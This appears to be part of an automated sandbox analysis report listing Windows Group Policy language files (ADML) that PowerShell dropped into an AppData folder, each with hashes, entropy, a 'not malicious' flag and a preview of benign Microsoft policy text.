Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WdiScenarioCategory">Windows Memory Leak Diagnosis</string>.. <string id="WdiScenarioExecutionPolicy">Configure Scenario Execution Level</string>.. <string id="WdiScenarioExecutionPolicyExplain">This policy setting determines whether Diagnostic Policy Service (DPS) diagnoses memory leak problems.....If you enable or do not configure this policy setting, the DPS enables Windows Memory Leak Diagnosis by default.....If you disable this policy setting, the DPS is not able to diagnose memory leak problems.....

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\LinkLayerTopologyDiscovery.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (460), with CRLF line terminators
Category:	dropped
Size (bytes):	3646
Entropy (8bit):	4.907043755326407
Encrypted:	false
SSDEEP:	48:cgeD5x8gm8fKIZNW4D5Drf3R5SMxeHJ/LLXdMD5ebqKrf3R5SfxeHJ/LLgX3jqS0:LeD5pmON3ljPep+sqajiep4X3jqSGvV
MD5:	92DBAD98F0E768C7BFE966BD839BB017
SHA1:	DE0047F6E6C1A639102804F0D9081783488BB331
SHA-256:	14DAFF44ECBEC76CDE21CCC68D5558BD6119A5F58C6884B9692B6341EAD643DD
SHA-512:	F74CAACA0D2CE8E4E8702E83E6F077C6BC17BC69CF2BE40698227FE003A7C1291F22D49CB3FEB50A8D418C1083EAE6767474F21AAC7F83A40620F6B461611723
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="LLTD_Category">Link-Layer Topology Discovery</string>.. <string id="LLTD_Category_Help">Configures all Link-Layer Topology Discovery components.</string>.. <string id="LLTD_EnableLLTDIO">Turn on Mapper I/O (LLTDIO) driver</string>.. <string id="LLTD_EnableLLTDIO_Help">This policy setting changes the operational behavior of the Mapper I/O network protocol driver.....LLTDIO allows a computer to discover the topology of a network it's connected to. It also allows a computer to initiate Quality-of-Servic

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\LocationProviderAdm.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1212
Entropy (8bit):	4.9162916170648305
Encrypted:	false
SSDEEP:	24:2dgeD5eo8gWt4+3Fbef61yYr2XjEEgr2WMb/fLqI2LHIQIeQLUgH7IYLjXr2cE5n:cgeD5x8gm8fKBqTETqRXLqbLoQWLUgbU
MD5:	FE47798FE9B3F4C43E782DF1AF166A87
SHA1:	909EE6F13A9F43305857C64DF1F2B8C91797A60B
SHA-256:	F4EDEF9970D1E3EE016E880537DB88D7B6A3B5ABD142D791FC39D39FC4E1FFA9
SHA-512:	3487FA625323C52C6BB52C09051CE0C5E41A1EAB45448C5471B2378DFDF6E478DF36E3424F08946B6F1C516E795E138CC87166DF81B4D463B5E04166949FE14E
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisableWindowsLocationProvider">Turn off Windows Location Provider</string>.. <string id="DisableWindowsLocationProvider_Explain">.. This policy setting turns off the Windows Location Provider feature for this computer..... If you enable this policy setting, the Windows Location Provider feature will be turned off, and all programs on this computer will not be able to use the Windows Location Provider feature..... If you disable or do not configure this policy setting, all programs on this

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Logon.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with very long lines (587), with CRLF line terminators
Category:	dropped
Size (bytes):	16832
Entropy (8bit):	4.631442685712746
Encrypted:	false
SSDEEP:	384:HD5n9zbzDznNtlY2iFwIcnBJGciF7BZXmhdtP0:nzbzDzn9YPJMGcitzmx0
MD5:	7DEB6528B7BF721DA0BC53B65116E4B2
SHA1:	999291B1970366D2256B0081EBE8420E6519D13E
SHA-256:	CFF8BFAD325C4F3BE418A491D37BB367E126F24EE22FA39C809C83AED6C07033
SHA-512:	BC22B74FF1FEA301961650160914422A5A986B7082C27140817E8ABE0E2720CB9578B8EF637182CBAE5CB7E3AC8481F4E334A815645E3F13A82163A7941FEC61
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="UseOEMBackground">Always use custom logon background</string> .. <string id="UseOEMBackground_Help">This policy setting ignores Windows Logon Background.....This policy setting may be used to make Windows give preference to a custom logon background. ....If you enable this policy setting, the logon screen always attempts to load a custom background instead of the Windows-branded logon background. ....If you disable or do not configure this policy setting, Windows uses the default Windows logon background or cu

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\MMC.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (374), with CRLF line terminators
Category:	dropped
Size (bytes):	4806
Entropy (8bit):	4.701920186548574
Encrypted:	false
SSDEEP:	96:LeD5pmQsFOr1sf4h/p1IXr5KQ6A735FlZ+HQsvYxyOsFV:EsFOriforIkQ6A7zlZ+HvvYxyOsn
MD5:	E7286B16AB9A79A941457D0E5F7AC2D9
SHA1:	7E41AA47B450F332DAC6A9AEE8B1021397ACC90F
SHA-256:	5CE95BDC6780550FAD262390A824CDB07D6B426683FE1E8AFA533D6A47A8E79B
SHA-512:	5BCDA870EF7DCEDA95D4C44B8EDB9DB08BB937D5D5FB07601DE231BA21C7B7902A8D74F6A33352132C0F5D2E84C47E9AE855290444B76EDD6A59792BD8BD67C2
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="MMC">Microsoft Management Console</string>.. <string id="MMC_ActiveXControl">ActiveX Control</string>.. <string id="MMC_ExtendView">Extended View (Web View)</string>.. <string id="MMC_ExtensionSnapins">Extension snap-ins</string>.. <string id="MMC_LinkToWeb">Link to Web Address</string>.. <string id="MMC_RESTRICT">Restricted/Permitted snap-ins</string>.. <string id="MMC_Restrict_Author">Restrict the user from entering author mode</string>.. <string id="MMC_restrict_Author_Explain"

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\MMCSnapIns2.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (332), with CRLF line terminators
Category:	dropped
Size (bytes):	3258
Entropy (8bit):	4.817177716053599
Encrypted:	false
SSDEEP:	48:cgeD5x8gm8fKqgONUGM7MG1T7yvG/sFO3hsFaSb7AqIAF9dFpgJcJTU8OiFQBeQs:LeD5pmnGCpZ7r/sFgsFaK735Sf/cMeFV
MD5:	181EDEAB7F0FA1FD7DA1D157121386D1
SHA1:	B4F9B4B91FD9D8EFA327E20516DE975892A706F1
SHA-256:	258D9502CBD3B2B6E342D1B705A17A6537865D066BEC2227BD4BD5A4D3E411F9
SHA-512:	99FF5FD5A9E50F1AE843845CC54E616F73DE24270261496087E902AB5AAA286ED9C9A19DCB230857774834DF20AAA2056D052D905F12ACBB338C845BFE8D1B9D
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="MMC_StorageManagerForSANSSnapIn">Storage Manager for SANs</string>.. <string id="MMC_StorageManagerForSANSSnapInExtension">Storage Manager for SANS Extension</string>.. <string id="MMC_FileServerResourceManagerSnapIn">File Server Resource Manager</string>.. <string id="MMC_FileServerResourceManagerSnapInExtension">File Server Resource Manager Extension</string>.. <string id="MMC_DiskManagementSnapInExtension">Disk Management Extension</string>.. <string id="MMC_DFSSnapIn">DFS Management</st

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\MMCSnapins.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (333), with CRLF line terminators
Category:	dropped
Size (bytes):	10156
Entropy (8bit):	4.902850417863983
Encrypted:	false
SSDEEP:	192:Eha8zqIFaazk71nt3xuH+6gqb7UFfFaK7Oz/cExtqRACAmn:u2IFWke6gqHBcR9r
MD5:	A30AB3FB1BA97BFD3AD477AD18D0BE28
SHA1:	9175E307ED491957EEB303BC6BEB8F6ABB2EB0FB
SHA-256:	48663270C2B2ED9475692772CBF5B12B635D75FA293E3059F8B81D8B4D02382E
SHA-512:	13DD57C61196B2DAC93F8C4FF602ACEA6644B4DEA08FF96B2770C50EC98CE73A9F9C3CEA3BF29ED7A3E5089474F27653BFBBDFC515FB378965D107DDA252BF0D
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="MMC_ActiveDirDomTrusts">Active Directory Domains and Trusts</string>.. <string id="MMC_ActiveDirSitesServices">Active Directory Sites and Services</string>.. <string id="MMC_ActiveDirUsersComp">Active Directory Users and Computers</string>.. <string id="MMC_ADMComputers">Administrative Templates (Computers)</string>.. <string id="MMC_ADMUsers">Administrative Templates (Users)</string>.. <string id="MMC_ADSI">ADSI Edit</string>.. <string id="MMC_AppleTalkRouting">AppleTalk Routing</stri

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\MSDT.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4822
Entropy (8bit):	4.7368864262977635
Encrypted:	false
SSDEEP:	96:LeD5pmtzIVVV78jVqaqGCs1HVVpLg2uw+F8c6mqSaM17CsQe2ce9e2bgzKDB2QSV:EL8jVqaTpCwSfqSaQpQe2c8e2SuS3l
MD5:	CD6F4B94C65A6A5F650EEDCC4108C1F9
SHA1:	BB95196861D768DE33C1A574CD3C3B05DE281B8B
SHA-256:	91692970671C4A0AC5A872A787F7C8D5B7C69BC36503D2815408443EA7B820DB
SHA-512:	41E53997E7FE19552B50DAE9B3E9DDC61289B69DFBD05A837A05E023D67B103DE17BC794CA897BB69DB59CBA6564471C26AD9B0C31811065E98C2270B1D67D5E
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WdiScenarioCategory">Microsoft Support Diagnostic Tool</string>.. <string id="WdiScenarioExecutionPolicy">Microsoft Support Diagnostic Tool: Configure execution level</string>.. <string id="WdiScenarioExecutionPolicyExplain">This policy setting determines the execution level for Microsoft Support Diagnostic Tool.....Microsoft Support Diagnostic Tool (MSDT) gathers diagnostic data for analysis by support professionals.....If you enable this policy setting, administrators can use MSDT to collect and send di

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\MSI.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (499), with CRLF line terminators
Category:	dropped
Size (bytes):	30569
Entropy (8bit):	4.629506484487412
Encrypted:	false
SSDEEP:	384:S3fWPIaG5EBoj8lK1I8DBkpkBLNPn4WCMIb53woYlHMwIxTQMNBN2wJKPCoz1Nqb:7wI8DhTSb53w/4DRb
MD5:	281E7FFCCBCB02FC616FEBF6F291B411
SHA1:	EB918DDA656626758F3B4B993C12CB04BA7F18E3
SHA-256:	BEA0490CA9E830B84869A273D0011683A54FA4E92E0EFF63B9F123CFFFC40C60
SHA-512:	6C932E4F13F9FE7C0C38A92C85808138C8ACB0CA925A8B5B149CA3C0F081B90112C52A165E37DEB5A400E300386108A9CC8D8F75D68D697798E34B40325E270A
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AllowLockdownBrowse">Allow users to browse for source while elevated</string>.. <string id="AllowLockdownBrowse_Help">This policy setting allows users to search for installation files during privileged installations.....If you enable this policy setting, the Browse button in the "Use feature from" dialog box is enabled. As a result, users can search for installation files even when the installation program is running with elevated system privileges.....Because the installation is running with elevated system p

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\MediaCenter.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1133
Entropy (8bit):	4.94325326862628
Encrypted:	false
SSDEEP:	24:2dgeD5eo8gWt4+3Fbef61yDIuQF6FVMFV:cgeD5x8gm8fKbyqFV
MD5:	7EFC78CEE6A256186F169D12466F667D
SHA1:	C190C0FAB77A5095D595ED65CF1E0ADF81A9AE7E
SHA-256:	DD91079C05795BD2BBA3C3F0A7167A5B8760A540C2E3000F379D4058D2E67258
SHA-512:	B5A90208C5A69F90DB1F7C90B161E066FFDFF2761BECC314D1611709EFE31848D250A45EFFBF60356E71C00370A99252CE8D4ECB804683575528F5E6FCE7432A
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="MediaCenter">Windows Media Center</string>.. <string id="MediaCenter_Disable">Do not allow Windows Media Center to run</string>.. <string id="MediaCenter_Disable_Help">This policy setting allows or prevents Windows Media Center to run.....Windows Media Center is a digital media player and video recorder that allows users to organize and play music and videos, and to view and record live television.....If you enable this policy setting, Windows Media Center will not run.....If you disable or do not configu

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\MobilePCMobilityCenter.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1205
Entropy (8bit):	4.9534177597350935
Encrypted:	false
SSDEEP:	24:2dgeD5eo8gWt4+3Fbef61yLwjaMb3zjS/RmN3FooRFV:cgeD5x8gm8fKkqaM3a/RmNqAFV
MD5:	F4ED8285AC3F6D33796ECEB5A7D654D7
SHA1:	8856483D9DE028B8ADED5807E7F786E61BA9A969
SHA-256:	94D9C7AAF148F31B6129B5567F963832427DE828DCD7E0B31F1BCBDBD5DBED3C
SHA-512:	6B7A56459CCC4DDE7A3EE144334295653B394D5D6499E98FC0184244D6FE4B3BE38324492378EA88C4851133678287CD4C5381120F83488AE639279CBFC8A328
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="MobilityCenterCat">Windows Mobility Center</string>.. <string id="MobilityCenterEnable">Turn off Windows Mobility Center</string>.. <string id="MobilityCenterEnableExplain">This policy setting turns off Windows Mobility Center.....If you enable this policy setting, the user is unable to invoke Windows Mobility Center. The Windows Mobility Center UI is removed from all shell entry points and the .exe file does not launch it.....If you disable this policy setting, the user is able to invoke Windows Mobility

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\MobilePCPresentationSettings.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (366), with CRLF line terminators
Category:	dropped
Size (bytes):	1482
Entropy (8bit):	4.847847941024891
Encrypted:	false
SSDEEP:	24:2dgeD5eo8gWt4+3Fbef61ycjpb3BnEndr90fFV:cgeD5x8gm8fKrV3Bn2RSfFV
MD5:	3D1BC388407E64D128728E5259ADAC99
SHA1:	AAF0BD72A00F01936A1B8CFF0DD9F43B4A5DEB06
SHA-256:	EC7D1B396B99416F267F99BA8D7A81199284C01CAE1A19081F2670233FA02F20
SHA-512:	68A27081AA8ABEAECED75720102C4712FCBFB0BF77918A8C47C62BA0EC4FA0F369DD605A91AF0B671DC079053F0A1328B6F5DBA9A0623E8B03095FCB65F6D83C
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="PresentationSettingsCat">Presentation Settings</string>.. <string id="PresentationSettingsEnable">Turn off Windows presentation settings</string>.. <string id="PresentationSettingsEnableExplain">This policy setting turns off Windows presentation settings.....If you enable this policy setting, Windows presentation settings cannot be invoked.....If you disable this policy setting, Windows presentation settings can be invoked. The presentation settings icon will be displayed in the notification area. This wi

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Msi-FileRecovery.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (333), with CRLF line terminators
Category:	dropped
Size (bytes):	3082
Entropy (8bit):	4.810214089047188
Encrypted:	false
SSDEEP:	48:cgeD5x8gm8fKyxgteEKvv4NYlVOdX71JDerq5x0BsYu9tP4XEgV:LeD5pmHWwua5PD2qjCsNtPeV
MD5:	DA778ED24DE53EF1BAF75408032E34A8
SHA1:	20B3E050E4094CDEA1765EFA73AE92DADF4D3F18
SHA-256:	1FA3057260F8642ADAF7C30D68CBDF5703BCBE983ACBEB0335FD31347D8CE4CB
SHA-512:	393A383F1CA87036A1893150514276B1277816CDAAC1704891D0345C1464D53B22C0ACD752EAF4B130EA8E3C40C3B4AC86FDADBBCD2F792414E79575C746BD82
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WdiScenarioCategory">MSI Corrupted File Recovery</string>.. <string id="WdiScenarioExecutionPolicy">Configure MSI Corrupted File Recovery behavior</string>.. <string id="WdiScenarioExecutionPolicyExplain">This policy setting allows you to configure the recovery behavior for corrupted MSI files to one of three states:....Prompt for Resolution: Detection, troubleshooting, and recovery of corrupted MSI applications will be turned on. Windows will prompt the user with a dialog box when application reinstallat

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\NAPXPQec.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.0468646750436905
Encrypted:	false
SSDEEP:	24:2dgeD5eo8gWt4+3Fbef61ylySwH3ZhAEonuYNuEZsFV:cgeD5x8gm8fKiSYdmFV
MD5:	A4208900FDE8B3665E5C81E299CA7BFF
SHA1:	D15B972870FC4A1FBFF2E709DBC6AB031E4A46E6
SHA-256:	156AC533DE885DE2086D1506713B46BFBCFDEB20FCD783B16C3CD4C143868549
SHA-512:	A40CFC29E6C50B0CE4D98A1F9FFF71DBB17C8A33C7018BD9C4BD80BC31257D279F75057C3EEE1AC47F5A40FC16493D188CEFFAC7B0F5C70D16E22B1A492AC97D
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="NAP_Category">Network Access Protection</string>.. <string id="NAP_XP_1x_QEC">Allow the Network Access Protection client to support the 802.1x Enforcement Client component</string>.. <string id="NAP_XP_1x_Help">This policy setting allows the Network Access Protection (NAP) client to support the Windows XP version of the 802.1x Enforcement Client component.....If you enable this policy setting, NAP allows the Windows XP version of the 802.1x Wireless Enforcement Client to participate. ....If you disa

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\NCSI.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (417), with CRLF line terminators
Category:	dropped
Size (bytes):	5609
Entropy (8bit):	4.807720215972321
Encrypted:	false
SSDEEP:	96:oD5pmB6SbbXVjG7/loPSNYOag8hW3QDFzdQFXukdFeYoZTe2FRA15VrpbWFo9FV:+jErVjGmighWmAd8KoPe
MD5:	C62CBB79E2AF2E3CC1FD69206D0C9716
SHA1:	3C18FFFC927A30CCD66B2D23D553BCA29642497D
SHA-256:	5E583582C0A4A933C3A0E4A4270E034DE6B8DD23B2676A1ECAD986DB71F28E7D
SHA-512:	B65C8F3EF4A1DBA11E8E915F8E31A874E83042923F98941CD8441066C103ABBB61A720BF24729CE17DEDC1916873BB86E7C5E1830D4AA96982EE0592E3830F2D
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2008 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Network Connectivity Status Indicator Group Policy Settings</displayName>.. <description>Network Connectivity Status Indicator Group Policy Settings</description>.. <resources>.. <stringTable>.. <string id="NCSI_Category">Network Connectivity Status Indicator</string>.. <string id="NCSI_CorpWebProbeUrl">Specify corporate Website probe URL</string>.. <string id="NCSI_CorpWebProbeUrl_Help">This policy setting enables you to specify the URL of the corporate website, against which an active probe is performed.</string>.. <string id="NCSI_CorpDnsProbeHost">Specify corporate DNS probe host name</string>.. <string id="NCSI_CorpDnsPro

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Netlogon.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with very long lines (1008), with CRLF line terminators
Category:	dropped
Size (bytes):	46428
Entropy (8bit):	4.777664679838725
Encrypted:	false
SSDEEP:	768:MwjkYrp+MHlkfrwiTrotseXkz4l/hHui7n421:/wYrcMHlkfrwiTrot3Xk8l9uM40
MD5:	B6CB2AF44B11487F92D14A3E9B7B4F70
SHA1:	DCFC1F715BD49D62021568F76D8CD3BBB85D01CF
SHA-256:	14B401FBE6F5FD279430D383196F16AC0D93EE665D0225C7F2C4C3DD56D7B847
SHA-512:	7373B5EFF0A8574961C7373CEF567071852FB57663978ED9E1A8BB2E9B6E4AB1390260204B518D40621AEC4B5F14A18793BE7D4550ADABBA0BDA11FFA90EEA6A
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Netlogon">Net Logon</string>.. <string id="Netlogon_AllowSingleLabelDnsDomain">Use DNS name resolution with a single-label domain name instead of NetBIOS name resolution to locate the DC</string>.. <string id="Netlogon_AllowSingleLabelDnsDomain_Help">This policy setting specifies whether the computers to which this setting is applied attempt DNS name resolution of a single-label domain names.....By default, the behavior specified in the AllowDnsSuffixSearch is used. If the AllowDnsSuffixSearch policy is d

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\NetworkConnections.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (1486), with CRLF line terminators
Category:	dropped
Size (bytes):	41991
Entropy (8bit):	4.576451646468249
Encrypted:	false
SSDEEP:	768:0dx8EooEviP1PjM6PtCldxD9xI2FzOkRZWx+LmCYvecgy3W7dlDelurmYEg4g+z/:iFOI
MD5:	0F0684FA5CF664EAF158690457E68D92
SHA1:	DFA272AD045597933D1144F01921EABA0B6BC4A4
SHA-256:	E86F5AD0D0A55ED34D90A2EE7222564656C684FCA48F9CE2C0363266C7C10ECE
SHA-512:	ED1BEF62FA7CECD3E618F31D951259704A13910E4AD3276C396003AF543EE6C6FBC86E4573366D6103D997B1C2DE98E879AE08BAB5676BE2F12579CBEDDD7D10
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="NC_AddRemoveComponents">Prohibit adding and removing components for a LAN or remote access connection</string>.. <string id="NC_AddRemoveComponents_Help">Determines whether administrators can add and remove network components for a LAN or remote access connection. This setting has no effect on nonadministrators.....If you enable this setting (and enable the "Enable Network Connections settings for Administrators" setting), the Install and Uninstall buttons for components of connections are disabled, and admini

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\NetworkIsolation.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	exported SGML document, ASCII text, with very long lines (461), with CRLF line terminators
Category:	dropped
Size (bytes):	6746
Entropy (8bit):	4.9079819692940125
Encrypted:	false
SSDEEP:	96:V+D5pmzqJhUf3fJyoZ+EsiZoTCdhY5+J6M6xpBGbvH4J5w4V:qdU/hyoXZoSrJ6nxpkbvHKN
MD5:	39E7220D62B6A3DBB2C126FBB57233BA
SHA1:	FA2CA706CB425FF910215D0E0D84DC05FEC673B6
SHA-256:	D7FDCFBCAD3F6A8CAE618320A16E408B4EF7A2830EBE54AC141F8CD37C4B26D2
SHA-512:	843380F52E434137DE92DF229B2C5103223EB4A22C6A52FC679B63A943938BD38B5AA5167F4DDB6620E921CEA1315B1EA84E1847AD83C780419FC1470E93E9BE
Malicious:	false
